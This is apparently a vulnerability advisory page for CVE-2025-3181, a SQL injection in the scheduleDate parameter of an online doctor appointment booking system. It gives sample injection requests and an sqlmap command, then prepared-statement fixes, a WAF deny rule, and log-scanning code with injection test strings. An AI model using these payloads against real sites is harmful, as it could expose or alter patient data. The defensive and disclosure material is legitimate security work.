How CVE-2025-3181 Works
The vulnerability is in the `appointment.php` file of Online Doctor Appointment Booking System 1.0. The `scheduleDate` parameter is not properly sanitized before being used in SQL queries, so an attacker can inject SQL code through it. When a crafted value is sent in the `scheduleDate` parameter, the backend database executes unintended commands, which can expose sensitive patient data, modify records, or give the attacker unauthorized access. The attack is remotely exploitable without authentication, making it critical.
DailyCVE Form
Platform: Online Doctor Appointment Booking System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Manual Exploit Example:
GET /patient/appointment.php?scheduleDate=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--&appid=1 HTTP/1.1
2. SQLMap Command:
sqlmap -u "http://target.com/patient/appointment.php?scheduleDate=1&appid=1" --risk=3 --level=5
3. Blind SQLi Detection:
GET /patient/appointment.php?scheduleDate=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--&appid=1 HTTP/1.1
Protection
1. Input Sanitization:
$scheduleDate = mysqli_real_escape_string($conn, $_GET['scheduleDate']);
2. Prepared Statements:
$stmt = $conn->prepare("SELECT * FROM appointments WHERE scheduleDate = ? AND appid = ?"); // placeholders keep user input out of the SQL text
$stmt->bind_param("si", $scheduleDate, $appid); // "s" = string, "i" = integer
$stmt->execute();
3. WAF Rule:
location ~ appointment\.php { if ($args ~* "scheduleDate=.*([';]|%27|%3b)") { return 403; } }
4. Patch Verification:
curl -I "http://target.com/patient/appointment.php?scheduleDate=1'"
5. Log Monitoring:
grep "appointment\.php.*scheduleDate" /var/log/apache2/access.log | grep -Ei "[';]|%27|%3b"
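A stricter form of the log check in step 5, as an added example (not code from the original page or from the affected project): it percent-decodes `scheduleDate` and flags any request to `appointment.php` whose value is not a plain date. Assumptions: Apache common/combined log format, a normal `scheduleDate` of the form YYYY-MM-DD, and a hypothetical function name `suspicious_requests`; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log line: capture the client IP and the request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: the application expects scheduleDate as YYYY-MM-DD.
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")

def suspicious_requests(lines):
    """Return (client_ip, decoded scheduleDate) for each request to
    appointment.php whose scheduleDate is not a plain date."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log request line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/appointment.php"):
            continue
        # parse_qs percent-decodes values, so ' and %27 are treated alike.
        values = parse_qs(url.query, keep_blank_values=True).get("scheduleDate", [])
        for value in values:
            if not DATE_RE.fullmatch(value):
                hits.append((ip, value))
    return hits

# Constructed sample input (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [15/Apr/2025:10:01:02 +0000] "GET /patient/appointment.php?scheduleDate=2025-04-20&appid=1 HTTP/1.1" 200 512
198.51.100.7 - - [15/Apr/2025:10:01:09 +0000] "GET /patient/appointment.php?scheduleDate=1'&appid=1 HTTP/1.1" 500 0
198.51.100.7 - - [15/Apr/2025:10:01:11 +0000] "GET /patient/appointment.php?scheduleDate=2025-04-20%27%3B&appid=1 HTTP/1.1" 200 512
192.0.2.10 - - [15/Apr/2025:10:02:00 +0000] "GET /patient/index.php HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tscheduleDate={value!r}")
```

Only query-string values appear in an access log, so a `scheduleDate` sent in a POST body is not covered by this check.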
Sources:
Reported By: nvd.nist.gov